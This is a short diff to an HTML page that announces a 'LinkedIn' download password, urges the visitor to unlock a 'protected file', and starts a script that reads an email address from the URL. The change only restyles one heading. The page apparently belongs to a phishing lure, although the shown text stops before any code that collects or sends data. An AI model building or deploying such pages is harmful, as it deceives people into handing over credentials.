--- a/index.html
+++ b/index.html
@@ -1,7 +1,8 @@
 <script language="javascript">alert(' The download password is: LinkedIn');  </script>
 
 <center><h2>Unlock your download by entering the File Password:<b> Linkedin <p>Then click on the "Download Protected File"  button to get instant access to your content!</h2>
-<center><h2><b>File Password: </b> Linkedin </b></h2>
+<div style="font-size:16pt; color:green;" align="center"><b>File Password: </b> Linkedin </b> </div>
+
 
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
